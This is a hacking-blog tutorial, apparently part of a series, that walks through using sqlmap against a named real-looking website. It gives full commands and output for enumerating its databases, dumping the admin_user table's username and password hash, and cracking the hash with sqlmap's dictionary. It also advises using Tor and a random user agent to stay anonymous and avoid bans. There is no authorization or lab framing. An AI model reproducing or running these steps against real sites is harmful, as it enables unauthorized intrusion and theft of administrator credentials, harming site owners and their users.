Tutorials | Challenges | Tools | Downloads | Resources | Documentaries

Finding & hacking SQL Vulnerable Sites | BLACKBOx & SQLMAP | Part 2

sqlmap


 The are many switches for SQLMAP that affects the way it works when injecting a website. They all have various important usages which range from remaining anonymous in our attack, to bypassing a firewall/IDS

In this tutorial, we will focus the essential switches that must be used, which are:
-u     (the URL of our target)
--random-agent     (spoof as an agent/browser)
--dbs     (Collect the database names)
-D     (used to select a database)
--tables     (show the tables of a specified database)
-T     (used to select a table)
--columns     (show the columns of a specified table)
-C     (used to select a column)
--dump     (show/release the contents)


Note: If you have Tor installed on your system, it's also a good idea to use the switch --tor which will stop your IP address from possibly being banned.
Firstly, we will find the databases of our target. Let's open our terminal and type:

sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent --dbs

Here is some common output & typical questions:

[info title="SQLMAP" icon="info-circle"]
[14:30:41] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:30:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
[/info]

[success title="OUTPUT" icon="check-circle"]
+-----------------------+
| language         
| admin_modules    
| admin_user       
| adminmoduleaccess
| albums           
| category         
| events           
| gallery          
| left_panel_image 
| login_history    
| maillist         
| member           
| menumanager      
| newsletter_subscriber
| order_details    
| orders           
| pdfupload        
| product_category 
| product_category_old
| products         
| resource_countries
| reviewmanager    
| sitepages        
| slide_box        
[*]
[/success]


let's try to obtain usernames and passwords. To do so, we simply just choose the hottest looking relative table (admin_user), and check it's columns:


sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user --columns

[success title="OUTPUT" icon="check-circle"]
 +----------------------+    ---------------------+
    | Column               |    Type           
    +----------------------+    ---------------------+
    | admin_email          | varchar(80)   
    | admin_first_name     | varchar(45)    
    | admin_last_name      | varchar(45)    
    | admin_level               | smallint(6)    
    | admin_pass               | varchar(65)    
    | admin_status             | smallint(6)    
    | admin_user_name     | varchar(45)    
    | created                     | int(15)        
    | id                              | bigint(20) unsigne
    | porn                          | int(15)        
    | login_attempt_failed | int(2)         
    | stuff_to_hate              | int(15)        
    | module_access          | varchar(255)   
    | security_token           | varchar(255)   
    +----------------------+---------------------+[*]
[/success]

Now we choose a column that we want to dump:
sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user -C admin_user-name --dump


Here is an admin's username:

[success title="OUTPUT" icon="check-circle"]
+------------------------------+
| admin_user_name
+------------------------------+
| sjw                        
+------------------------------+
[/success]

Let's  choose the other column admin_pass:
sqlmap -u http://socialjusticewarrior.org/index.php?id=1 --random-agent -D sjw -T admin_user -C admin_pass --dump


From the following response, we can choose to save the password hashes so they can be used with another cracking tool, or continue using SQLMAP to do the cracking.
[info title="SQLMAP" icon="check-circle"]
[14:41:51] [INFO] recognized possible password hashes in column 'admin_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[14:42:31] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[/info]


The password hash was cracked in about 2 seconds by SQLMAP's default dictionary:
 [success title="OUTPUT" icon="info-circle"]
+----------------------------------+
| admin_pass                  
+----------------------------------+
| 15bed54f422df0895e16d15c2f3673d2
| ineedalife                  
+----------------------------------+
[/success]



Note: you can dump multiple columns at the same time, which is more practical. To do this, you would use commas. For example: -C admin_pass, admin_username, id --dump
Labels:
Reactions:

Post a Comment

[blogger]

GrayHatHackers

{twitter https://twitter.com/ghhackers}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget